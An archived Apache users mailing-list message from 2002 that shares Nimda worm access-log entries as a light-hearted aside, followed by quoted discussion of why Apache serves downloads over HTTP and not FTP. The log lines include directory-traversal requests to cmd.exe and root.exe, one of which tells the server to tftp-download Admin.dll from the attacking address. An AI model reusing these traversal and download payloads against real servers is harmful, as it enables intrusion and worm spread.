httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Daniel G" <t...@ct5.com>
Subject RE: minor vent (& a little nimda)
Date Fri, 01 Mar 2002 03:26:36 GMT

See, Herb you could be sitting on the floor of your colo dealing with
poop like this... 

 
Here's an example -

207.86.144.105 - - [28/Feb/2002:02:38:32 -0500] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 200 1942 "-" "-"

... 72 practically identical lines deleted ...

207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105
%20GET%20Admin.
dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"
207.86.144.105 - - [28/Feb/2002:02:38:39 -0500] "GET 
/scripts/..%252f../Admin.dll HTTP/1.0" 200 1950 "-" "-"

------------------------------------------

Aren't ya glad it's Apache now???

Dan




On Thu, 28 Feb 2002, Rodent of Unusual Size wrote:

> Herb Peyerl wrote:
> >
> > (I'm going to unsub from this mailing list now, so if you feel
> > the need to vent back at me, please do it privately, so as
> > not to pollute this fine mailing list anymore than necessary).
>
> It's rather poor form to pollute the forum yourself and then
> duck out of taking the consequences.. <grin>
>
> I'm ccing the list because this *does* come up occasionally.  I
> handle the mail sent to the Foundation's general eddress, so
> it seems appropriate that I speak up.
>
> > Sure, I could probably build lynx on my webserver but in general,
> > why should I have to build a piece of software in order to
> > retrieve the source to Apache when every reasonable operating
> > system comes with a decent ftp client, and there are a lot of
> > relatively decent ftpd's that you folks could use?
>
> There are a number of reasons we have chosen to support HTTP
> only, and not ftp.  Three of those are: security, virtual hosts,
> and security.
>
> If you trust us enough to use our software, why do you choose
> to DIStrust that we have valid reasons for our configuration?
> --
> #ken	P-)}
>
> Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
> Author, developer, opinionist      http://Apache-Server.Com/
>
> "Millennium hand and shrimp!"
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server
Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server
Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org




---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message